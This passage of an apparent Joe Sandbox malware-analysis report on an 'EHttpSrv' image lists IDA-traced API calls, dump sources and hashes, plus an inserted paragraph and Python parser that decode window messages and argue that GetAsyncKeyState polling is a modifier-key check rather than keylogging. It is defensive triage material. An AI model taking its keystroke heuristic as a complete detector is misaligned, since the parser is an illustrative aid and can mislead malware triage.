                                                                                                                • Instruction Fuzzy Hash: 2D72FFB15083818BC731CF94C8C1BCFB3E5AF94709F04C95DE99997251EB78AA49CB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9D0
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9E0
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9F0
                                                                                                                • #764.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA09
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA22
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA3B
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA57
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA70
                                                                                                                • qsort.MSVCR80 ref: 2041CAA0
                                                                                                                • qsort.MSVCR80 ref: 2041CAE0
                                                                                                                • qsort.MSVCR80 ref: 2041CB0A
                                                                                                                • qsort.MSVCR80 ref: 2041CB34
                                                                                                                • qsort.MSVCR80 ref: 2041CB75
                                                                                                                • #265.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CBB3
                                                                                                                • #265.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CC14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$qsort$#265
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244314208-0
                                                                                                                • Opcode ID: 7c709b07dfba37b4dc4c9307eebcb5279ea5313f7d186075e51f952b3fc88257
                                                                                                                • Instruction ID: ecd76e829027cae471c9e580738ce7b99bde1b95d902c318f8ba6eef2ec4f2fd
                                                                                                                • Opcode Fuzzy Hash: 7c709b07dfba37b4dc4c9307eebcb5279ea5313f7d186075e51f952b3fc88257
                                                                                                                • Instruction Fuzzy Hash: 2BB190B16002059BCB14DFA8CC82A9AB7A1FF48304B94C52DF91997751D739FE85DBC0
                                                                                                                APIs
                                                                                                                • GetFocus.USER32 ref: 20433624
                                                                                                                • #2366.MFC80U(00000000), ref: 2043362B
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 2043363C
                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 20433645
                                                                                                                • GetFocus.USER32 ref: 20433686
                                                                                                                • #2366.MFC80U(00000000), ref: 2043368D
                                                                                                                • GetParent.USER32(?), ref: 204336BE
                                                                                                                • #2366.MFC80U(00000000), ref: 204336C5
                                                                                                                • #2648.MFC80U(00000000), ref: 204336D5
                                                                                                                • SendMessageW.USER32(?,00000111,?,?), ref: 204336ED
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 2043372C
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433739
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 20433746
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?), ref: 2043377A
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?), ref: 20433787
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?), ref: 20433794
                                                                                                                • #5210.MFC80U(?), ref: 204337BC
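The API lists above are raw IDA-plugin traces from the EHttpSrv image mapped at 0x20400000: each line is a call site, with hexadecimal argument values where IDA could recover them and `?` where it could not. Two details matter for triage and are easy to misread in this form. First, the SendMessageW calls in the function at 204276c0 carry message 0x181 with 0x19A paired to indices 0..5, and the function at 20433624 carries 0x111; read against winuser.h these are LB_INSERTSTRING / LB_SETITEMDATA and WM_COMMAND, i.e. list-box population and a command notification, not inter-process signalling. Second, the GetAsyncKeyState calls that trigger the "retrieve information about pressed keystrokes" signature in the overview poll 0x11 and 0x10 (VK_CONTROL and VK_SHIFT) directly after GetFocus, which is the ordinary modifier-key check of a UI handler; a keylogger sweeps the key range in a loop, which would show up as a `?` argument inside a back edge in the control-flow graph. The parser below is an added example, not part of the Joe Sandbox report; it reads lines in this report's "APIs" format, resolves the constants that appear in this section (from winuser.h) and states the keystroke assessment explicitly. The sample input is constructed by copying individual lines from the two functions above; the MFC80U `#NNNN` entries are export ordinals and are left unresolved.

```python
import re
from collections import Counter

# Constructed sample: lines copied from the "APIs" sections of the two functions above.
SAMPLE_APIS = """\
• _snwprintf_s.MSVCR80 ref: 2042788E
• #2310.MFC80U(?,000000F7,?), ref: 204278BA
• SendMessageW.USER32(?,00000181,00000000,?), ref: 204278D5
• SendMessageW.USER32(?,0000019A,00000000,00000000), ref: 204278E6
  • Part of subcall function 20412B10: memset.MSVCR80 ref: 20412C00
• GetFocus.USER32 ref: 20433624
• GetAsyncKeyState.USER32(00000011), ref: 2043363C
• GetAsyncKeyState.USER32(00000010), ref: 20433645
• SendMessageW.USER32(?,00000111,?,?), ref: 204336ED
• InvalidateRect.USER32(?,?,00000001,?,?,?), ref: 2043372C
"""

# One trace line: optional "Part of subcall function X:" prefix, Func.Module, optional
# hex argument list, and the call-site address after "ref:".
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<sub>[0-9A-Fa-f]+):\s*)?
        (?P<func>\#?\w+)\.(?P<module>\w+)
        (?:\((?P<args>[^)]*)\),?)?
        \s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$""",
    re.VERBOSE,
)

# Constants from winuser.h; only the values that occur in this section are listed.
WINDOW_MESSAGES = {0x0111: "WM_COMMAND", 0x0181: "LB_INSERTSTRING", 0x019A: "LB_SETITEMDATA"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL"}


def parse_api_line(line):
    """Parse one trace line into a dict; '?' arguments become None. Returns None if not a call line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    if m.group("args") is not None:
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return {
        "func": m.group("func"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
        "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
    }


def fmt(v):
    return "?" if v is None else f"0x{v:X}"


def describe(call):
    """Render a call with the message ID or virtual-key code resolved where the position is known."""
    f, a = call["func"], call["args"]
    if f == "SendMessageW" and len(a) == 4 and a[1] is not None:
        return f"SendMessageW({fmt(a[0])}, {WINDOW_MESSAGES.get(a[1], fmt(a[1]))}, {fmt(a[2])}, {fmt(a[3])})"
    if f == "GetAsyncKeyState" and len(a) == 1 and a[0] is not None:
        return f"GetAsyncKeyState({VIRTUAL_KEYS.get(a[0], fmt(a[0]))})"
    return f"{f}({', '.join(fmt(x) for x in a)})"


def keystroke_assessment(calls):
    """Separate a modifier-key check (fixed VK_SHIFT/VK_CONTROL probes, as in the function above)
    from a key-range sweep (variable key code, typically inside a loop)."""
    probes = [c["args"][0] if c["args"] else None for c in calls if c["func"] == "GetAsyncKeyState"]
    if not probes:
        return "no keystroke polling"
    if None in probes:
        return "polls a variable virtual-key code: check the CFG for a loop over the key range"
    keys = sorted(set(probes))
    if set(keys) <= VIRTUAL_KEYS.keys():
        return "modifier-key check only: " + ", ".join(VIRTUAL_KEYS[k] for k in keys)
    return f"polls {len(keys)} distinct virtual keys: " + ", ".join(VIRTUAL_KEYS.get(k, fmt(k)) for k in keys)


def summarize(text):
    """Parse a whole 'APIs' section and return per-module counts, decoded calls and the keystroke verdict."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    return {
        "calls": calls,
        "by_module": dict(Counter(c["module"] for c in calls)),
        "decoded": [describe(c) for c in calls],
        "keystrokes": keystroke_assessment(calls),
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_APIS)
    for line in result["decoded"]:
        print(line)
    print(result["by_module"])
    print(result["keystrokes"])
```

The decoder resolves only the second SendMessageW argument and the single GetAsyncKeyState argument, because those are the positions whose meaning is fixed by the API; everything else is printed as raw hex so that nothing is guessed. Resolving the `#NNNN` MFC80U ordinals would need the export table of the MFC80U.dll version this image was linked against.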
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect$#2366$AsyncFocusState$#2648#5210MessageParentSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2236022434-0
                                                                                                                • Opcode ID: e5f8472163658a24f54d053860e28f8de9d25d1832441840bc4068e4f68ef6cb
                                                                                                                • Instruction ID: d6c53d04e4ebd45af699540442615d6d0114f1a843398b458d8cfd05320b64f5
                                                                                                                • Opcode Fuzzy Hash: e5f8472163658a24f54d053860e28f8de9d25d1832441840bc4068e4f68ef6cb
                                                                                                                • Instruction Fuzzy Hash: EB4151B2204700ABD210DBB4CCC1FA7B3A8BB88709F50DA5DF689C7241DA75E945C761
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpfreemalloc$#1176#764
                                                                                                                • String ID: APP_FLAGS$BROWSER$BROWSERS$EXCLUDE$PATH$PE_MODULE$PE_MODULES
                                                                                                                • API String ID: 794166511-2182823657
                                                                                                                • Opcode ID: d3f1f10bb759c6654089e1c046311acb2bc1d16ab627f953fef81cf91d9bdb57
                                                                                                                • Instruction ID: 2a6e87a75f8b3fc6c74a09f9cae7ecbd177b1ae4e2273b2d026749da02545a81
                                                                                                                • Opcode Fuzzy Hash: d3f1f10bb759c6654089e1c046311acb2bc1d16ab627f953fef81cf91d9bdb57
                                                                                                                • Instruction Fuzzy Hash: 4AE172B15083419FC714CF99C880A5BB7E6BF98718F408A3DF999A7341D739EA05CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#1176#310$#1472#764
                                                                                                                • String ID:
                                                                                                                • API String ID: 2349227323-0
                                                                                                                • Opcode ID: 2610227527bf31bb19fbea4ff1886cc389bc402f13e30b8bf6ed253e8d00ae44
                                                                                                                • Instruction ID: a3ba692aaab1c2b727c89d8f7a094161e0542b32f1d56c50a55c7a7b244e2afa
                                                                                                                • Opcode Fuzzy Hash: 2610227527bf31bb19fbea4ff1886cc389bc402f13e30b8bf6ed253e8d00ae44
                                                                                                                • Instruction Fuzzy Hash: 7002CD715047058FE710CBA8C89479AFBF0AB59398F04C62DEEA482391D77D99C9CBC2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E00B
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E024
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E03D
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E056
                                                                                                                  • Part of subcall function 2041E000: #764.MFC80U(?,?,2046787F), ref: 2041E06F
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 20467887
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2046789B
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C441
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C45A
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C473
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C48C
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4A5
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4BE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4CE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4DE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4FA
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C516
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$CriticalSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 2103548376-0
                                                                                                                • Opcode ID: 085e8e5a0ce7d527f7d903e2f80839138fa4aeeafd138ec853872318bbc58ad1
                                                                                                                • Instruction ID: 400d4e8f41712a9da6c49c509346afd119955d52c450d2ecaee229d74a835260
                                                                                                                • Opcode Fuzzy Hash: 085e8e5a0ce7d527f7d903e2f80839138fa4aeeafd138ec853872318bbc58ad1
                                                                                                                • Instruction Fuzzy Hash: B042F2711083808FC335CFA8C884FDBB7E5AF95718F148A5EE59857391EB389A45CB92
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?), ref: 20464BC8
                                                                                                                  • Part of subcall function 20464AB0: #2461.MFC80U(00010001,?,?,?,?,20464BD4,?), ref: 20464AF8
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 20464C3F
                                                                                                                • #764.MFC80U(?,?,?,?,00000000,00000000), ref: 20464CA7
                                                                                                                • #764.MFC80U(?,?), ref: 20464D50
                                                                                                                • #764.MFC80U(?,?,FEEA6C22,?,?,?), ref: 20464E2D
                                                                                                                • #764.MFC80U(?,?,?), ref: 20464F19
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9D0
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9E0
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041C9F0
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(00000000,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA09
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA22
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA3B
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA57
                                                                                                                  • Part of subcall function 2041C9A0: #764.MFC80U(?,?,?,?,00000000,2041EEEA,?,?,?,?,?,?), ref: 2041CA70
                                                                                                                  • Part of subcall function 2041C9A0: qsort.MSVCR80 ref: 2041CAA0
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C441
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C45A
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C473
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C48C
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4A5
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4BE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4CE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4DE
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C4FA
                                                                                                                  • Part of subcall function 2041C400: #764.MFC80U(?,FEEA6C22,00000000,?,?,00000000,2047EF37,000000FF,204141E8), ref: 2041C516
                                                                                                                  • Part of subcall function 204677F0: EnterCriticalSection.KERNEL32(?), ref: 20467887
                                                                                                                  • Part of subcall function 204677F0: LeaveCriticalSection.KERNEL32(?), ref: 2046789B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$CriticalSection$EnterLeave$#2461qsort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3166723043-0
                                                                                                                • Opcode ID: 6fc30c7af073cabd18ac7b3964380b98f00c32fa149624f82ab689f31ac1673f
                                                                                                                • Instruction ID: e8b5675c7224ba4e7748d1bd8268b0e2504bea7d3dd32206b2339b0d9384b6ac
                                                                                                                • Opcode Fuzzy Hash: 6fc30c7af073cabd18ac7b3964380b98f00c32fa149624f82ab689f31ac1673f
                                                                                                                • Instruction Fuzzy Hash: A3C16A715083818BC735CF94C884B9BF7E8BFD8704F448D2EE99997255E734A904CB92
                                                                                                                APIs
                                                                                                                • _crt_debugger_hook.MSVCR80(00000001), ref: 20478FD5
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 20478FDD
                                                                                                                • UnhandledExceptionFilter.KERNEL32(20483C84), ref: 20478FE8
                                                                                                                • _crt_debugger_hook.MSVCR80(00000001), ref: 20478FF9
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 20479004
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 2047900B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1952319052-0
                                                                                                                • Opcode ID: 860ed5c6a1f2dbeceea49a0963ff88d4ebbc692b8e68553eadb04c93b2242d31
                                                                                                                • Instruction ID: 8bac57b613e01f3e289521a234b69ccc3e518c181047f61f5409c8e065ca41fd
                                                                                                                • Opcode Fuzzy Hash: 860ed5c6a1f2dbeceea49a0963ff88d4ebbc692b8e68553eadb04c93b2242d31
                                                                                                                • Instruction Fuzzy Hash: FB21C476809A01AFD300DF54DEA47987FB2BB08309F50C5AAE908963B1EF7D5580AF45

APIs
• FindResourceW.KERNEL32(00000000,00000251,GIF,?,?,00000000,?,2047270C,00000000), ref: 2043AC0B
• LoadResource.KERNEL32(00000000,00000000,?,2047270C,00000000), ref: 2043AC20
• LockResource.KERNEL32(00000000,?,2047270C,00000000), ref: 2043AC2B
• SizeofResource.KERNEL32(00000000,00000000,?,2047270C,00000000), ref: 2043AC39
Strings
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: GIF
• API String ID: 3473537107-881873598

APIs
• #1176.MFC80U(?,?,00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 20421292
• SendMessageW.USER32(?,00001023,00000000,00000000), ref: 204212A4
• SendMessageW.USER32(?,00001025,00000000,00000000), ref: 20421333
• #1176.MFC80U(?,00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204213D8
  • Part of subcall function 20421820: #762.MFC80U(00000008,FEEA6C22,00000000,?), ref: 2042189B
  • Part of subcall function 20421820: CreateFontIndirectW.GDI32(?), ref: 204218C6
  • Part of subcall function 20421820: #1271.MFC80U(00000000), ref: 204218CF
• #1176.MFC80U(?,00000000,?,?,00000000,?,?,00000000,?,?,?,00000004), ref: 204215B3
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #1176$MessageSend$#1271#762CreateFontIndirect
• String ID:
• API String ID: 3567125150-0

APIs
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0

Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
